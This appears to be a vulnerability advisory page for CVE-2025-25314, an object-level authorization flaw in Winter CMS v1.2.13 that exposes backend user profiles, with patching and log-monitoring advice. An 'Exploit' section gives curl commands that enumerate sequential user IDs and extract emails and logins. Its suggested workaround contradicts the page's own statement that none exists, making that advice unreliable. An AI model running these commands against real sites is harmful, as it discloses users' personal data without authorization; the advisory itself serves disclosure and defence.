Winter CMS (BOLA) Information Disclosure – CVE-2025-25314 (Medium) -DC-Aug2026-1704

Listen to this Post

The vulnerability exists in Winter CMS versions prior to v1.2.14, specifically within the `Backend\Controllers\MyAccount` controller introduced in v1.2.13. This controller implements the `FormController` behavior, which provides standard routable actions like create, update, and preview, each accepting a record ID via the URL. The `index()` method passes the authenticated user’s own ID, but the inherited actions were left routable. The critical flaw lies in the `formFindModelObject()` method, which was not scoped to the authenticated user. Consequently, a user-supplied ID in the URL resolved against an unscoped `Backend\Models\User` query, enabling access to arbitrary user records. The `preview` action exposed sensitive profile fields, while `update` revealed additional data like roles and superuser status, though password fields were masked. IDs are sequential, making enumeration trivial. The flaw is exploitable via simple GET requests without CSRF protection, leading to unauthorized disclosure of backend user profiles. The fix involves routing-level guards and query scoping in v1.2.14, but no workarounds are available besides patching.

DailyCVE Form:

Platform: Winter CMS
Version: v1.2.13
Vulnerability: BOLA Info Disclosure
Severity: Medium
date: 2026-08-20

Prediction: v1.2.14 released

What Undercode Say:

Check your Winter CMS version
php artisan winter:version
Test for vulnerability by fetching another user's preview
curl -X GET "https://your-site.com/backend/backend/myaccount/preview/2" \
-H "Cookie: winter_session=..."

Exploit: (Educational Purposes!)

Enumerate user IDs sequentially
for id in {1..10}; do
curl -s -o /dev/null -w "%{http_code}" "https://target.com/backend/backend/myaccount/preview/$id"
done
Extract email and login from the response
curl -s "https://target.com/backend/backend/myaccount/preview/5" | \
grep -E '"email":"|"login":"'

Protection:

  • Upgrade to Winter CMS v1.2.14 or higher immediately.
  • If unable to upgrade, add `protected $guarded = [‘create’, ‘update’, ‘preview’];` and implement `formExtendQuery()` scoping in modules/backend/controllers/MyAccount.php.
  • Monitor backend access logs for unusual GET requests to `/myaccount/preview/{id}` or /myaccount/update/{id}.

Impact:

Unauthorized disclosure of backend user profile data including names, login, email, avatar, roles, groups, superuser flag, and throttle state. Exposed data can aid further targeted attacks or privilege escalation reconnaissance.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top